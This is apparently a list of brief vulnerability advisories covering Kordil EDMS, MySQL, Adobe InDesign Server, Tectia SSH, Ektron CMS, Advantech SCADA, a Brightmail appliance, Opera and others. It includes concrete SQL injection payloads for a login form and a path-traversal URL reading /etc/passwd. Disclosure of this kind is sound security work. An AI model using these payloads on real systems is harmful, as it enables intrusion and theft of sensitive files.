Ingress Security has found multiple SQL injection vulnerabilities in the Kordil EDMS software. Proof of Concept: URL: http://localhost/kordil/global_group_login.php Type: Error-based Payload: User=admin&Password=12345' AND EXTRACTVALUE(1299,CONCAT(0x5c,0x3a6a6f793a,(SELECT (CASE WHEN (1299=1299) THEN 1 ELSE 0 END)),0x3a6a77683a)) AND 'hax'='hax&act=n&QS_Submit=Submit URL: http://localhost/kordil/global_group_login.php Type: Blind - Time-based Payload: User=admin&Password=12345' AND SLEEP(5) AND 'hax'='hax&act=n&QS_Submit=Submit
This modules takes advantage of a file privilege misconfiguration problem specifically against Windows MySQL servers (due to the use of a .mof file). This may result in arbitrary code execution under the context of SYSTEM. However, please note in order to use this module, you must have a valid MySQL account on the target machine.
This module abuses the 'RunScript' procedure provided by the SOAP interface of Adobe InDesign Server, to execute abritary vbscript (Windows) or applescript(OSX). The exploit drops the payload on the server and must be removed manually.
NVIDIA Install Application 2.1002.85.551 (NVI2.dll) contains a buffer overflow vulnerability in the 'AddPackages' function of NVI2.dll when handling the value assigned to the 'pDirectory' string variable. An attacker can exploit this vulnerability by inserting an overly long array of data which may lead to execution of arbitrary code.
This module exploits a vulnerability in Tectia SSH server for Unix-based platforms. The bug is caused by a SSH2_MSG_USERAUTH_PASSWD_CHANGEREQ request before password authentication, allowing any remote user to bypass the login routine, and then gain access as root.
This module exploits a vulnerability in Ektron CMS 8.02 (before SP5). The vulnerability exists due to the insecure usage of XslCompiledTransform, using a XSLT controlled by the user. The module has been tested successfully on Ektron CMS 8.02 over Windows 2003 SP2, which allows to execute arbitrary code with NETWORK SERVICE privileges.
Advantech Studio v7.0 SCADA/HMI has a built in web server NTWebServer.exe, the web server is a standalone executable that is used along side every project to serve as a web based management system with the help of an activex. The flaw occurs because of a lack of any check on the path of the file requested. This allows an attacker to read any file on the system, including the project files and the web server configuration file.
The vulnerability would enable an attacker (who has authenticated to the web interface) to download arbitrary files from the appliance with the permissions of the Webserver user. Various files containing sensitive information can be downloaded using a crafted URL for example: http://192.168.1.59:41080/brightmail/export?type=logs&logFile=../../../etc/passwd&logType=1&browserType=1.
It would be relatively easy for an attacker to add a backdoor-administrator to the system, by getting a logged-in adminstrator to view a webpage with a specially crafted image-tag. This is partly due to the fact that GET and POST requests are interchangeable, there is no password protection on sensitive functions, and there is not CSRF protection in the product.
Opera is a web browser and Internet suite developed by Opera Software with over 270 million users worldwide. The browser handles common Internet-related tasks such as displaying web sites, sending and receiving e-mail Messages, managing contacts, chatting on IRC, downloading files via BitTorrent, and reading web feeds. Opera is Offered free of charge for personal computers and mobile phones. Heap corruption during the handling of the Gif files context-dependent Successful exploits can allow attackers to execute arbitrary code
Services By CQR